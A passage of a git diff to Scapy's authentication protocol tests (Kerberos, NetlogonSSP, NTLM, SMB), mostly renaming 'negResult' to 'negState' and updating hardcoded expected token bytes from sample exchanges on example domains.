IP(b'E\x00\x05\x95\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x7f\x00\x00\x15\x00X;p\x05\x81\x00\x00k\x82\x05u0\x82\x05q\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0b\xa2H0F0D\xa1\x03\x02\x01\x13\xa2=\x04;0907\xa0\x03\x02\x01\x12\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com\xa3\x13\x1b\x11SAMBA.EXAMPLE.COM\xa4\x150\x13\xa0\x03\x02\x01\x00\xa1\x0c0\n\x1b\x08LOCALDC$\xa5\x82\x03\xafa\x82\x03\xab0\x82\x03\xa7\xa0\x03\x02\x01\x05\xa1\x13\x1b\x11SAMBA.EXAMPLE.COM\xa2&0$\xa0\x03\x02\x01\x02\xa1\x1d0\x1b\x1b\x06krbtgt\x1b\x11SAMBA.EXAMPLE.COM\xa3\x82\x03a0\x82\x03]\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x01\xa2\x82\x03O\x04\x82\x03K\t\x05\xd7\x91\xdc\x14\xaa\xe2\xfb\xcc\x85\x1f*?\xbau\xbc0\x0f\x80\x8bc\x87\xe5z\x1a4i\xa3\x9bL[-\xb1\xb7\xaa\xd9-\x01\xc2\xf2\xdfs\x17<\xf3&\x99\'1\xfa\x80\xd9\x02\xae\xf5\xb3S\x14\xc2L\xc3e\xc9\x94\x03dH\xe2\xa9\xfd\x9a\xc6\xffs\x10\xf3er\xbd\xa0\xfep[~\x82+\xde0\x91%tc\xdcx\xfe\xd0\xd8\xc4\xb6u\x91\xe7\xe1C\x00y\xb8\x15\xd9\x91j\x0f\xe7\xa0\xe24m\xd94\xe5.I\xc51\x8f\x1do\t\xe9\x98\xb8\xad\xa6\x92\xf3\x15f\xc98o\x92\x0ch\x08\\\x8f\xab\xfau\xaf\x19v\xcc\xcb!v\xb5v2\xeb(h\x1c+o\xea\xc3\x0b\xcf\x81\xc8\x89\xe8i\xdd?\xd1\xaa\x0f3\xc9\xe9\xf2\xd7\x8a\x93`\x02\x9d\xb2 LV\xda\x0f&>,~\xb3\xecK\xe76v\x9a\xc3\x88\xe3\rj\\/\xd6\x9e_X\x14z\xc2w\x1d.|\xbf\x18\x01\xc8`].\xd2\xc2\x1e\xd0\x89\x8f\xd2\x18\xb9U\xaf\x98\xe9V\xe2\x19\xa1\xbb\xc45\xd9\x16\x08c\xaf$\xef\xf2\xf4S\xeco\xa1\xa1\xe5)\x99\xc9b#[\xd1:O\xbej\xb91\xb3i\xbepb\x06\xd8\x14\xc3\xdf\xbb\x18\xbf]\xf1\x82+\x18*\x85D\xecy\x0eu_\xe2\xfa\xbcd\x82A>\x88p\xa2\xc1\xf6\x9c\x89Qj\xfdM\x99\xd1\x84r\x0fp\x06$\xab\xc2\xb5\xae4\xe8\xf1\xbb}\x98\xedWX\xe2*uB\x93\x11\x1c\xc7f\x1c\xce\xc9\xff\t\x88\x94\xddN\xcf\xa68O\x0c^I\x9ew\x81\xba\xc3\xbc\xa8\x07\x8b\xd4\xdf\x7f(\xc2\x15gX\xd0oN\x00u\x1aU@\xbd\xb8\xa9)Ur\x94\xc1\xcf\xa1\xd8k\xc1F\x19\xd3rR\xaa\x93\xe2\x06D#\x12\x07M\xe3\x15\xd6\xd0\xb3\xa6\x89\x0c\xfeLO6\xe6\xf0w\x1a\x80\x0f\xffO\xf2N\xf4(\n\xdb-\x96`\xa4\xb7\xd3g\x16\xbfY\xff\xad\x95\x19\xd9\x9cS\xaa\xe3\x06W\xf3\xc2\x18it5\xda\x1c\x99\x8a\xaf\xfa"MT\xc7$#j,P\x9b\xf9\r\xbbA\xd0w\x15.\xc3PC\xc4\xe7vL/\xca0h7\x1c4z\x8bS@\x0ej\xb4q\xde\x19\xd8so\x9c\xea\x8f^w7\x1e\x92\x1c\xcc\xe2\xa60\xe8\xce}\xee\xb1\x87F!n\x80\xe4l"\xed\xc2fI \xb9\t\x14\t\x8d\xect\xa4\xb48\xe0\xfd\xf3\xe5\x8es\xd2\x08;\x9f\xb2\xb8q\x1bX\xadd\xbb\x07z\x16\tZ\xb0z1+h\x0e\xf7\x98w\x0bX\xf0W\t\xa6\x86.\x1e\x9c\xc2\x9d\xac+\xca\xdf&\xa9\xf3\xcb\xa7\xca\x1fn\xe8\x8a]h\xf6\xeb\xe9\xd4\xa0\x16\x1b\xb4\x8d\xc7\xaf\xe3\xf0.\x85\x1e\xc2\xa5\xf2DhhgQ\xe0\xb8y\xb8\xbd\x98\xf8\xa0\rW\x93/\x07>0\xf5\x92Y\x15Y\x0bD\xdb\xd6\xac#\xd8z\xbdeY\x87\xf2\x97\xfdZ\x0c\x1d\xbc\xefXONv\xc9\xfdp\xdd^\x16\x83\xc3\xeb\x9e\x96+\xe8\xed\x0c<$\x83A\xeb\xc6e\x94\x0c\x11\x19\xb4\x99\xcd\x17\xeb\xcb.\x0b}\x01i\x88\x03R\xde\x1a\xea\x03\x10\xa9Z\x8e\xf7\x87\r\xa6\x08@\xf7\x96\xc8\xa5g\xde\x8dE\xf8\xb0\xe8\xe6T\x80=\x0cm\xe0z\xa5\x03\xa2X\xed\'\x17\x001O\xee\xfb\x87\xbe\xf7\xbbS\xc1p\xaeZ\x17\x92}\xc2\x07\x01\x81\xaew\xd9\xc5\x9c\xe5k\x8d+\x13\xd2\x00Q\xd4\xe5M\x9d\x06\xc7)\xac\x06\xb2+\xd1\x83\xcb\xfe\xb9\xf9\x0bbRN\x04\xe7\xd8\xa0\xf9\xe3\xc3m\x18\xc4\x108\xfa\xa6\x82\x01:0\x82\x016\xa0\x03\x02\x01\x12\xa2\x82\x01-\x04\x82\x01)/pDi\x13\xee\x0b\x8ehN2\x01P\x19|\xda\x1a\xde\xec\xde\rt\xcbe7\x00-sG&\x8b\xfc\xa4\x92~~[,\xd5\rAj\xd6[\xbe\xeeB\xf8X\\x\xa6$Z\x83\xf6\x1bq\xc5\x8fm\\\x94\xd7l\xc5\x89#\xcb\xcd\xaf\xff\x15\x1b\x8f;7\xb0\xc8u\x19\xb1\xd0\xb0\x93\xa7z\x9cz\x14\x0b\x86q\x01\xb8<\xa7\xa4\xceb\x1f\x88\x14\xe3S0\xe3]\xa5\x9b\xa0\x0e\x97#\x87\x9a\xe0\x90a\xdfj.\x1e6x\x87GV\xc0/\xa4\xab}\xdbS\xd5\xff\x03\x03\xae\x18n\x1aQ\r\x7fP\xdb\xfe\xe9\xeb\xab2\x9dws9\xf5\xcb\x94\xab\xc1\x9e\xbd\x08\x0f\xfcx\x18\x1b\xf8\x1f\xf2\'\x18-\xe4"\x93vuTf3\xbdj\xb6\x88%\x8a\x94\xd12\xfbY\x0f\x81R\xd3\xf1\x9b\xd5Z\x1f3o\xb7\xc3\x82\x14\t\x87\xac#\x89\x13M\x803\x88/\x92==S$\xa3\xe9\xf5C{\xd7\x0f\t^k\xb0\x0e\xe6\x8d\x8f!\x91+\x19\xb2y$\xc6\x1bN;\xfehA\x1f\x9f"\r\xe8\xda\xce\x00\xe7g\xb6b17\x06s\rM\xc8S\x9b0\x9f\xc7^l\xa4\xca\xe4p\xcd\xf1,\xc3\xcf\xb1\x91Hn>^\xb8\xc8\x07#\xb2\xb0G;\x07\xe4\xeaM8T\x87\xdd0=\xf2\xdb\x8d1\xf8\xc9\rS\xc4\xad\xcf9\xadx\xcfl\x85\xfb\xb8{LN\xe51\xa4,!3\xdf+\x03b\x13#t\xdf\x99T \xe4\xb2\xa6\xd1\xe1\x9dxy\xd5\x18e-Q\x01\xa3\x16\x96+\'\xb3\x88L\xb6}\x07W/\x96\xb9f\x8c\xa4,\xcas\x11\xa7\x15*\xc7\xc6\xd4\x92\x00\x91\x92\xfaJpy\x89\xe4;*\x10\xf1\x9eS^|\xf8\xaf\xda\xf6<\xe9\xa2\xa8\\\xe1\xbd\x17\xd8\x1c\xfev\xd2\xceWY\xa7\xfd\xbe\xffo\xb2y\xb8b\x0b\xc2\xc5\x18;$\xbe\x83\x1c~\xe1W\x11O\'\x00\xda!\x0b6\xed\xb7\xbd\xa7\xd9\x1a2\xf7\x94\x0b\xefC\x1cvW\x1c\xd4D\x99\xf7y\xccN\xbe\x82\x9f\xb3N\xea\xa1\xe4B$\rYb\xbd\xbc\xbc\x16\xc9b\x97KTn\x9c\xee8\r\xdaI\xf6Q\xac\xc5\xc5\x8a\xca\xe4\xad\x06\xd5~K\x91\xd8\xc5Use\xe8\xdd\xda~\xe9U\tc\xd7\rOV\xb4O\xc5\xa2n)\xb3l\xb2\x1d\x11"\x18%\xb5\xa2!|\xb1\xf1EM4\xd9J\x85\\\xb8`\xf2\xfeCh\x1e=0.~\x12Bs\xdd\x18\xb0O\xdd\xf6`\xb8\x85\x8e\x1ex\xd0"\xcc\x03\xf4g\xf3\xcf\x1an]\xf5;\xb81yEB\xb1\xd0\x8e8\xd3\xbf\xb0\xbf.[\xa6\xf7Z\x0fw\xd5k\xf2\x92K\x14O\xff<\x87\xeczW\xbf\xf3E\xee\x8aD\x96gm8\xc9E<8\xe6E!\xdb-\xe6\xd6E*\xa8\xf3\xda\x16u\x13N\x8d\x90\xcb\xb0\xd2t\xcea\x89V?\xd9\xa5nV\xa8\x00f\x1ex{\x089Pb05\xdd\xee\xb2\xfb\x84\xf6\xfb%\x07\xf2\xc1W\xe7N\x81\xa8\x19p\xe1\x14u\xce\x92n9:U\xb0kw\xc4D\xdb\xd26\x88\xe8\xa7|\x7f03xt\xfe\xf7\x87\xa1\x87\xfc\xaf\xd7:ZH7\xc8\xe3\xe6\x07\x120\x85\x97\xffr\xea.\xda\xe6\x9c\x94\x02\xadz\xe8\x1a\xbb>\x91\x00\xf0\xc8{\x99\xb2VBF\xbdV\xaf\x8em\x0e\xcf)(\xe5\x15\x12\x18\xf7\xe6\'\xc5e\xe1U@foO|\x0e\x93|-\x0e\x84x/\xcb\x1bS^YolN\n\xed|\x1d5\x0e\x16\x9d\x04_.\xaa\xa4\xbb/\x94\xcd\x14\x95v\xf85\xe5\xee\xcbD\x18g}\x04D\xe5\x1f\xaf\xcb\xed*\xfa\xc5\x0b\x1d2\x0b\xc2#\xd2b6\x01\xae\xe6\xdfj6:$)K\xfb;\x00\xf2f\x8d\xfc@N\x9f\xa1\x7f\xe96\xe6b\x07V\xa6\x91\x8f}\xe2\xde4?8\x0f\xab\x83\xfd\xe9\x11\x12K\xe5\x08\xa4\x82\x01\\0\x82\x01X\xa0\x03\x02\x01\x12\xa2\x82\x01O\x04\x82\x01K\\>\t\xe4\x1d8,a(\x7f\x1e\xd2\x8dHH\x9c\xa3\x03?&\xb9\xf4\xba\xef\xcf\xcf\xb6(8\x91\x0f\xa3lq\xc6 f&Ou\xd8Bk\xe84s\xf1\xec\xf6\x97wY\xc6Un;\xf5\xdeh\xb9J\xd6\xaf\xf4r\x00\x80\x17\x8d\xc4p\x81\xac\x89\xf1\xf6\x98\xef\x1f\xb3\xe5\x91}\xf5m\x1a\xbd\x08\x1d\x0217W0\x81\xddZ\xec,J%\xe2o\x86\xef{"a\xe0\xe2hBc\xeb^\x8b\xa3\x8c\xf7W\xf9F\xc6&\x1a\x041\x0c\xdf\xc3S\xaa>\x04\x90\xd7\x8a\xdd\xf3j\x80#4_\x95u\xaby3\x0f\x878\xe3\',t\xa7\xe9\xba7&\xd6\x82y\x1d9\x06\xf1\xff\xaf\xb33O\xdb\x00\xc5\x19\xd0\xb7\t\xe9\xeb\xe0iv\x08\xaa\xf4\x00\xcaG\xbb7\xb9P\xcd\xcf\xcbC\x9b\xec\xfdH\x1b\xbf\x89\x11\x96L\xa8\xb4\\6\xcf\x9a\xa6\x16\xf0\xfb,\xaf\x06.qj\xf0\x03\xfd\xc0 \x80\xb6\xb84\xcf\xec\tW~5\xad,\x14-\xf05\x04\xb2\xd4[o\xce\xa3\xf9\x06\x08\x0e\xeb\x1e\xbf2\xd7\xe4\xc2\x14\xabn_\x0c8j;#\r\xee\xce\xa6\x1f\xc3+\xed\x0c\xb7\xabdb\xb4\x8b\xb2\xd0\xe97\xa5P\xcd\xf1\x96\x8aT:=\xfc\xd9\x1e\xb6q\xcdM\x16\xead\x81\x84/\xab\xdd\xc8\xe1\xed\x17\xa3\xf5\x1c\xf1\x98\xf1\xf7\xbd\xbc\xc8\xdf' + = GSS_Accept_sec_context (SPNEGO_negTokenResp: KRB_AP_REQ->KRB_AP_REP) with KrbRandomPatcher(): - srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) + srvcontext, tok, negState = server.GSS_Accept_sec_context(None, tok) -assert negResult == 0 +assert negState == 0 assert isinstance(tok, SPNEGO_negToken) tok = SPNEGO_negToken(bytes(tok)) assert isinstance(tok.token, SPNEGO_negTokenResp) -assert tok.token.negResult == 0 +assert tok.token.negState == 0 assert tok.token.supportedMech.oid == '1.2.840.48018.1.2.2' assert isinstance(tok.token.responseToken, SPNEGO_Token) -assert tok.token.mechListMIC is not None +assert tok.token.mechListMIC is None ap_rep = tok.token.responseToken.value.root assert isinstance(ap_rep, KRB_AP_REP) @@ -1478,15 +1647,15 @@ assert apreppart.subkey.keytype == 17 # Hardcode (yes this will probably require updating this test) bytes(tok) -assert bytes(tok) == b'\xa1\x81\xa90\x81\xa6\xa0\x03\n\x01\x00\xa1\x0b\x06\t*\x86H\x82\xf7\x12\x01\x02\x02\xa2r\x04pon0l\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0f\xa2`0^\xa0\x03\x02\x01\x12\xa2W\x04UaS\xeck\xcc\xad~\xfa^\x8d\xca\xbb\xc5\xd2/\xfd\xd3\xc3\xd9\xadN`\xd2;\xd7{\xb7\xf4p.\xa9\x9a\xb1}D\xc6|_t\n\r"M\xcd\xe2\t\xf0Ri\xc7\xcf\xb5\xefr9\xf0`iS7N\x06qKP\x06\xde\xc4\x18\xd5_\xcb\x0ct\x03k\xbc\xb9\x1adT\x03\xc1\x8bM\xa3\x1e\x04\x1c\x04\x04\x05\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x17F\x8al\x01c\x00\xcf4\x12oI' +assert bytes(tok) == b'\xa1\x81\x890\x81\x86\xa0\x03\n\x01\x00\xa1\x0b\x06\t*\x86H\x82\xf7\x12\x01\x02\x02\xa2r\x04pon0l\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0f\xa2`0^\xa0\x03\x02\x01\x12\xa2W\x04UaS\xeck\xcc\xad~\xfa^\x8d\xca\xbb\xc5\xd2/\xfd\xd3\xc3\xd9\xadN`\xd2;\xd7{\xb7\xf4p.\xa9\x9a\xb1}D\xc6|_t\n\r"M\xcd\xe2\t\xf0Ri\xc7\xcf\xb5\xefr9\xf0`iS7N\x06qKP\x06\xde\xc4\x18\xd5_\xcb\x0ct\x03k\xbc\xb9\x1adT\x03\xc1\x8bM' = GSS_Init_sec_context (SPNEGO_negToken: KRB_AP_REP->OK) with KrbRandomPatcher(): - clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) + clicontext, tok, negState = client.GSS_Init_sec_context(clicontext, tok) assert tok is None -assert negResult == 0 +assert negState == 0 assert clicontext.KrbSessionKey.key == srvcontext.KrbSessionKey.key assert srvcontext.KrbSessionKey.key == b'0000000000000000' @@ -1524,8 +1693,8 @@ sig = server.GSS_GetMICEx( ] ) assert isinstance(sig, KRB_InnerToken) and sig.TOK_ID == b"\x04\x04" -assert sig.root.SND_SEQ == 1 -assert bytes(sig) == b'\x04\x04\x05\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x01G\x81\x93\xb9\x92\xd0NvHH\xf6\x9c' +assert sig.root.SND_SEQ == 0 +assert bytes(sig) == b'\x04\x04\x05\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x98\xdeb<\x14\x1c\x9fe%{\x0e\xf7' client.GSS_VerifyMICEx( clicontext, [ @@ -1575,7 +1744,7 @@ server = KerberosSSP( = GSS_Init_sec_context (KRB_AP_REQ) - DCE_STYLE with KrbRandomPatcher(): - clicontext, tok, negResult = client.GSS_Init_sec_context( + clicontext, tok, negState = client.GSS_Init_sec_context( None, req_flags=( GSS_C_FLAGS.GSS_C_DCE_STYLE | @@ -1586,7 +1755,7 @@ with KrbRandomPatcher(): ) ) -assert negResult == 1 +assert negState == 1 assert isinstance(tok, KRB_AP_REQ) ap_req = KRB_AP_REQ(bytes(tok)) assert isinstance(ap_req, KRB_AP_REQ) @@ -1611,9 +1780,9 @@ assert bytes(tok) == b'n\x82\x06\x1d0\x82\x06\x19\xa0\x03\x02\x01\x05\xa1\x03\x0 = GSS_Accept_sec_context (KRB_AP_REQ->KRB_AP_REP) - DCE_STYLE with KrbRandomPatcher(): - srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) + srvcontext, tok, negState = server.GSS_Accept_sec_context(None, tok) -assert negResult == 1 +assert negState == 1 assert isinstance(tok, KRB_AP_REP) ap_rep = KRB_AP_REP(bytes(tok)) @@ -1629,9 +1798,9 @@ assert bytes(tok) == b'on0l\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0f\xa2`0^\xa0\x = GSS_Init_sec_context (SPNEGO_negToken: KRB_AP_REP->KRB_AP_REP) - DCE_STYLE with KrbRandomPatcher(): - clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) + clicontext, tok, negState = client.GSS_Init_sec_context(clicontext, tok) -assert negResult == 0 +assert negState == 0 assert isinstance(tok, KRB_AP_REP) ap_rep = KRB_AP_REP(bytes(tok)) @@ -1645,9 +1814,9 @@ assert bytes(tok) == b'oQ0O\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0f\xa2C0A\xa0\x = GSS_Accept_sec_context (KRB_AP_REP->OK) - DCE_STYLE with KrbRandomPatcher(): - srvcontext, tok, negResult = server.GSS_Accept_sec_context(srvcontext, tok) + srvcontext, tok, negState = server.GSS_Accept_sec_context(srvcontext, tok) -assert negResult == 0 +assert negState == 0 assert tok is None diff --git a/test/scapy/layers/msnrpc.uts b/test/scapy/layers/msnrpc.uts index 7b31bf85421..f678d7f6274 100644 --- a/test/scapy/layers/msnrpc.uts +++ b/test/scapy/layers/msnrpc.uts @@ -40,7 +40,7 @@ EncryptedMessage = bytes.fromhex("c930c9a079d95c78bea6a3150908c11f4b68e41219bcb9 # Perform the same operation using NetlogonSSP: client = NetlogonSSP(SessionKey=SessionKey, computername="DC1", domainname="DOMAIN", AES=True) -clicontext, tok, negResult = client.GSS_Init_sec_context(None) +clicontext, tok, negState = client.GSS_Init_sec_context(None) with mock.patch('scapy.layers.msrpce.msnrpc.os.urandom', side_effect=lambda x: Confounder): _msgs, sig = client.GSS_WrapEx( @@ -67,7 +67,7 @@ FullNetlogonSignatureHeader = bytes.fromhex("13001a00ffff00005d69950dfde45ae9f09 # Perform the same operation using NetlogonSSP: client = NetlogonSSP(SessionKey=SessionKey, computername="DC1", domainname="DOMAIN", AES=True) -clicontext, tok, negResult = client.GSS_Init_sec_context(None) +clicontext, tok, negState = client.GSS_Init_sec_context(None) with mock.patch('scapy.layers.msrpce.msnrpc.os.urandom', side_effect=lambda x: Confounder): _msgs, sig = client.GSS_WrapEx( @@ -287,9 +287,9 @@ server = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00", computernam = [NetlogonSSP] - RC4 - GSS_Init_sec_context (NL_AUTH_MESSAGE) -clicontext, tok, negResult = client.GSS_Init_sec_context(None) +clicontext, tok, negState = client.GSS_Init_sec_context(None) -assert negResult == 1 +assert negState == 1 assert isinstance(tok, NL_AUTH_MESSAGE) assert tok.MessageType == 0 assert tok.Flags == 3 @@ -299,9 +299,9 @@ assert bytes(tok) == b'\x00\x00\x00\x00\x03\x00\x00\x00DOMAIN\x00DC1\x00' = [NetlogonSSP] - RC4 - GSS_Accept_sec_context (NL_AUTH_MESSAGE->NL_AUTH_MESSAGE) -srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) +srvcontext, tok, negState = server.GSS_Accept_sec_context(None, tok) -assert negResult == 0 +assert negState == 0 assert tok.MessageType == 1 bytes(tok) @@ -309,9 +309,9 @@ assert bytes(tok) == b'\x01\x00\x00\x00\x00\x00\x00\x00' = [NetlogonSSP] - RC4 - GSS_Init_sec_context (NL_AUTH_MESSAGE->OK) -clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) +clicontext, tok, negState = client.GSS_Init_sec_context(clicontext, tok) -assert negResult == 0 +assert negState == 0 assert tok is None = [NetlogonSSP] - RC4 - GSS_WrapEx/GSS_UnwrapEx: client sends a encrypted payload @@ -400,9 +400,9 @@ server = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x = [NetlogonSSP] - AES - GSS_Init_sec_context (NL_AUTH_MESSAGE) -clicontext, tok, negResult = client.GSS_Init_sec_context(None) +clicontext, tok, negState = client.GSS_Init_sec_context(None) -assert negResult == 1 +assert negState == 1 assert isinstance(tok, NL_AUTH_MESSAGE) assert tok.MessageType == 0 assert tok.Flags == 3 @@ -412,9 +412,9 @@ assert bytes(tok) == b'\x00\x00\x00\x00\x03\x00\x00\x00DOMAIN\x00DC1\x00' = [NetlogonSSP] - AES - GSS_Accept_sec_context (NL_AUTH_MESSAGE->NL_AUTH_MESSAGE) -srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) +srvcontext, tok, negState = server.GSS_Accept_sec_context(None, tok) -assert negResult == 0 +assert negState == 0 assert tok.MessageType == 1 bytes(tok) @@ -422,9 +422,9 @@ assert bytes(tok) == b'\x01\x00\x00\x00\x00\x00\x00\x00' = [NetlogonSSP] - AES - GSS_Init_sec_context (NL_AUTH_MESSAGE->OK) -clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) +clicontext, tok, negState = client.GSS_Init_sec_context(clicontext, tok) -assert negResult == 0 +assert negState == 0 assert tok is None = [NetlogonSSP] - AES - GSS_WrapEx/GSS_UnwrapEx: client sends a encrypted payload diff --git a/test/scapy/layers/ntlm.uts b/test/scapy/layers/ntlm.uts index 83b66197297..8bc38dceb66 100644 --- a/test/scapy/layers/ntlm.uts +++ b/test/scapy/layers/ntlm.uts @@ -158,7 +158,7 @@ server = SPNEGOSSP([ = GSS_Init_sec_context (negTokenInit: NTLM_NEGOTIATE) -clicontext, tok, negResult = client.GSS_Init_sec_context( +clicontext, tok, negState = client.GSS_Init_sec_context( None, req_flags=( GSS_C_FLAGS.GSS_C_MUTUAL_FLAG | @@ -166,7 +166,7 @@ clicontext, tok, negResult = client.GSS_Init_sec_context( GSS_C_FLAGS.GSS_C_CONF_FLAG ) ) -assert negResult == 1 +assert negState == 1 assert isinstance(tok, GSSAPI_BLOB) tok = GSSAPI_BLOB(bytes(tok)) assert tok.MechType.val == '1.3.6.1.5.5.2' @@ -192,13 +192,13 @@ assert bytes(ntlm_nego) == b'NTLMSSP\x00\x01\x00\x00\x005\x82\x89\xe2\x00\x00\x0 = GSS_Accept_sec_context (SPNEGO_negTokenResp: NTLM_NEGOTIATE->NTLM_CHALLENGE) with NTLMRandomPatcher(): - srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) + srvcontext, tok, negState = server.GSS_Accept_sec_context(None, tok) -assert negResult == 1 +assert negState == 1 assert isinstance(tok, SPNEGO_negToken) tok = SPNEGO_negToken(bytes(tok)) assert isinstance(tok.token, SPNEGO_negTokenResp) -assert tok.token.negResult == 1 +assert tok.token.negState == 1 assert tok.token.supportedMech.oid == '1.3.6.1.4.1.311.2.2.10' assert isinstance(tok.token.responseToken, SPNEGO_Token) assert tok.token.mechListMIC is None @@ -216,41 +216,42 @@ assert ntlm_chall.getAv(0) = GSS_Init_sec_context (SPNEGO_negToken: NTLM_CHALLENGE->NTLM_AUTHENTICATE) with NTLMRandomPatcher(): - clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) + clicontext, tok, negState = client.GSS_Init_sec_context(clicontext, tok) assert isinstance(tok, SPNEGO_negToken) tok = SPNEGO_negToken(bytes(tok)) assert isinstance(tok.token, SPNEGO_negTokenResp) -assert tok.token.negResult is None +assert tok.token.negState is None assert tok.token.supportedMech is None assert isinstance(tok.token.mechListMIC, SPNEGO_MechListMIC) -sig = NTLMSSP_MESSAGE_SIGNATURE(tok.token.mechListMIC.value.val) +sig = tok.token.mechListMIC.value +assert isinstance(sig, NTLMSSP_MESSAGE_SIGNATURE) assert sig.Version == 1 assert sig.SeqNum == 0 assert isinstance(tok.token.responseToken, SPNEGO_Token) -ntlm_auth = NTLM_Header(tok.token.responseToken.value.val) +ntlm_auth = tok.token.responseToken.value assert isinstance(ntlm_auth, NTLM_AUTHENTICATE_V2) assert ntlm_auth.NegotiateFlags == 0xe2898235 assert ntlm_auth.UserName == "User1" assert ntlm_auth.DomainName == "DOMAIN" assert ntlm_auth.Workstation == "WIN10" assert ntlm_chall.TargetInfo[:6] == ntlm_auth.NtChallengeResponse.AvPairs[:6] -assert ntlm_auth.NtChallengeResponse.TimeStamp == ntlm_chall.getAv(7).Value assert ntlm_auth.NtChallengeResponse.getAv(6).Value == 2 assert ntlm_auth.NtChallengeResponse.getAv(9).Value == "host/WIN10" = GSS_Accept_sec_context (SPNEGO_negToken: NTLM_AUTHENTICATE->OK) -srvcontext, tok, negResult = server.GSS_Accept_sec_context(srvcontext, tok) -assert negResult == 0 # success :p +srvcontext, tok, negState = server.GSS_Accept_sec_context(srvcontext, tok) +assert negState == 0, negState # success :p assert isinstance(tok, SPNEGO_negToken) assert isinstance(tok.token, SPNEGO_negTokenResp) -assert tok.token.negResult == 0 +assert tok.token.negState == 0 assert tok.token.supportedMech is None assert tok.token.responseToken is None assert isinstance(tok.token.mechListMIC, SPNEGO_MechListMIC) -sig = NTLMSSP_MESSAGE_SIGNATURE(tok.token.mechListMIC.value.val) +sig = tok.token.mechListMIC.value +assert isinstance(sig, NTLMSSP_MESSAGE_SIGNATURE) assert sig.Version == 1 assert sig.SeqNum == 0 @@ -390,7 +391,6 @@ server = SPNEGOSSP( }, ), ], - force_supported_mechtypes=tok0.innerToken.token.mechTypes ) = Real exchange - Parse token 1 from client @@ -402,8 +402,8 @@ b"\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82" \ b"\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x0a\x00\x61\x4a\x00\x00\x00\x0f") -srvcontext, _, negResult = server.GSS_Accept_sec_context(None, tok1) -assert negResult == 1 +srvcontext, _, negState = server.GSS_Accept_sec_context(None, tok1) +assert negState == 1 = Real exchange - Inject token 2 from server @@ -425,7 +425,7 @@ b"\x00\x02\xea\x8e\xe8\xd2\x8d\xd9\x01\x00\x00\x00\x00") tok2.token.responseToken.value.show() # Inject challenge token -srvcontext.sub_context.chall_tok = tok2.token.responseToken.value +srvcontext.ssp_context.chall_tok = tok2.token.responseToken.value = Real exchange - Parse token 3 from client @@ -462,8 +462,8 @@ b"\x47\xdc\xcd\xb5\x5e\x13\x62\xa3\x12\x04\x10\x01\x00\x00\x00\x0f" \ b"\x96\x54\xbb\x55\xd0\x6c\xcb\x00\x00\x00\x00") # Parse auth -srvcontext, tok, negResult = server.GSS_Accept_sec_context(srvcontext, tok3) -assert negResult == 0 +srvcontext, tok, negState = server.GSS_Accept_sec_context(srvcontext, tok3) +assert negState == 0 = Real exchange - Check mechListMIC against token 4 from server diff --git a/test/scapy/layers/smb.uts b/test/scapy/layers/smb.uts index 6afcd4e9c60..1b90f1c348d 100644 --- a/test/scapy/layers/smb.uts +++ b/test/scapy/layers/smb.uts @@ -105,7 +105,7 @@ from scapy.layers.ntlm import * smb_sax_resp_1 = Ether(b"\x00\x0c)a\xf5_\x00PV\xc0\x00\x01\x08\x00E\x00\x01,\x03I@\x00\x80\x06\xe6\xaa\xc0\xa8\xc7\x01\xc0\xa8\xc7\x85\x00\x8b\xc2\x08\x10]}F\xd7\xcb\xefiP\x18\x00\xff\xeb)\x00\x00\x00\x00\x01\x00\xffSMBs\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08\x10\x00\x04\xff\x00\x00\x01\x00\x00\x93\x00\xd5\x00\xa1\x81\x900\x81\x8d\xa0\x03\n\x01\x01\xa1\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2x\x04vNTLMSSP\x00\x02\x00\x00\x00\x06\x00\x06\x008\x00\x00\x00\x15\x82\x8a\xe2\x88\xbc\x9bX4\xbe7\r\x00\x00\x00\x00\x00\x00\x00\x008\x008\x00>\x00\x00\x00\x06\x03\x80%\x00\x00\x00\x0fS\x00C\x00V\x00\x02\x00\x06\x00S\x00C\x00V\x00\x01\x00\x06\x00S\x00C\x00V\x00\x04\x00\x06\x00S\x00C\x00V\x00\x03\x00\x06\x00S\x00C\x00V\x00\x07\x00\x08\x00\xd5\x9d6\x9b\x84'\xd2\x01\x00\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x009\x006\x000\x000\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x006\x00.\x003\x00\x00\x00") assert SMBSession_Setup_AndX_Response_Extended_Security in smb_sax_resp_1 assert smb_sax_resp_1.AndXCommand == 255 -assert smb_sax_resp_1.SecurityBlob.token.negResult == 1 +assert smb_sax_resp_1.SecurityBlob.token.negState == 1 assert isinstance(smb_sax_resp_1.SecurityBlob.token.responseToken.value, NTLM_CHALLENGE) ntlm_challenge = smb_sax_resp_1.SecurityBlob.token.responseToken.value assert len(ntlm_challenge.Payload) == 2 @@ 